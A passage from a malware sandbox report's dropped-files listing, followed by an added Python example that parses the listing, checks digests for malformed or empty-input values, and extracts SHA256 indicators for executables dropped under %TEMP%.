  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

• memory/2320-721-0x0000000000400000-0x0000000000412000-memory.dmp
  Filesize: 72KB
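Added example, not part of the sandbox report: a Python parser for the label/value "dropped files" listing above, followed by a triage pass over each record. The sample text embedded in the block is a constructed excerpt copied from four of the entries on this page; the finding strings, the `%TEMP%` plus executable-extension rule and the empty-input digest check are this example's own choices and are not something the sandbox emits.

```python
"""Parse a flattened sandbox 'dropped files' listing and triage each record."""
import re
from typing import Dict, List, Optional

# Digests of zero-length input: an entry carrying these captured no bytes at all.
EMPTY_DIGESTS = {
    "MD5": "d41d8cd98f00b204e9800998ecf8427e",
    "SHA1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
    "SHA256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
    "SHA512": "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce"
              "47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e",
}
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
LABELS = {"Filesize", *DIGEST_LEN}
# Executable-type extensions; the %TEMP% rule in check_record is this example's own heuristic.
EXEC_EXT = (".exe", ".dll", ".scr", ".bat", ".cmd", ".vbs", ".js", ".ps1")

# Constructed sample: four entries copied from the listing on this page, blank lines removed.
SAMPLE = r"""
• C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\Horror8.bat
Filesize
915B
MD5
36fcf85ec52716f5fd8ea625a11c13c6
SHA1
60a720249c6bb3617e904445c247487dba96af9c
SHA256
3aba2d676284209730ff20b28a8415a3c41c88f402301b14437040bf2baebe0c
• C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\TrashMBR.exe
Filesize
47KB
MD5
87f09f4a202bf9c0adcf6fed942aa703
SHA1
96bf11ff017e31ec2242c0024c372628c40cbd4f
SHA256
acf8abe9bd2f61840a247b4796ebedad20f69a85dbdf8a4100f5d7d306b064b1
SHA512
85202719aa875b2697ae3082a79a3ca7c1e1be377d6b19f9f159488a5f9d6ec6e9ec35352b067a1bc15546165764acb108c11203bf482ea43684e433717eee58
• \??\pipe\crashpad_4728_IPYWWFNRJTQDWSNV
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
• memory/2320-721-0x0000000000400000-0x0000000000412000-memory.dmp
Filesize
72KB
"""


def parse_dropped_files(text: str) -> List[Dict[str, str]]:
    """One dict per '•' entry; each label line takes the next non-blank line as its value."""
    records: List[Dict[str, str]] = []
    current: Optional[Dict[str, str]] = None
    pending: Optional[str] = None  # label still waiting for its value line
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        if line.startswith("•"):
            current = {"path": line[1:].strip()}
            records.append(current)
            pending = None
        elif line in LABELS and current is not None:
            pending = line
        elif pending is not None and current is not None:
            current[pending] = line
            pending = None
    return records


def check_record(rec: Dict[str, str]) -> List[str]:
    """Findings for one record: malformed or empty-input digests, then what kind of artifact it is."""
    findings: List[str] = []
    for algo, length in DIGEST_LEN.items():
        value = rec.get(algo)
        if value is None:
            continue  # memory dumps and some pipes carry no digest at all
        if len(value) != length or not re.fullmatch(r"[0-9a-f]+", value):
            findings.append(f"malformed {algo}")
        elif value == EMPTY_DIGESTS[algo]:
            findings.append(f"{algo} is the empty-input digest")
    path = rec["path"].lower()
    if path.startswith("memory/"):
        findings.append("memory dump (size only, no file hash)")
    elif path.startswith("\\??\\pipe\\"):
        findings.append("named pipe, not a file on disk")
    elif "\\appdata\\local\\temp\\" in path and path.endswith(EXEC_EXT):
        findings.append("executable content dropped under %TEMP%")
    return findings


def extract_iocs(records: List[Dict[str, str]]) -> List[tuple]:
    """(path, SHA256) for every executable %TEMP% drop whose digests are well-formed and non-empty."""
    out = []
    for rec in records:
        findings = check_record(rec)
        usable = not any(f.startswith("malformed") or "empty-input" in f for f in findings)
        if usable and "executable content dropped under %TEMP%" in findings and "SHA256" in rec:
            out.append((rec["path"], rec["SHA256"]))
    return out
```

Running `extract_iocs(parse_dropped_files(SAMPLE))` yields the two hashable drops (Horror8.bat and TrashMBR.exe) and leaves out the crashpad pipe, whose digests are the empty-input values and would match every zero-byte file if pushed to a blocklist, and the memory dump, which has no file hash to match on.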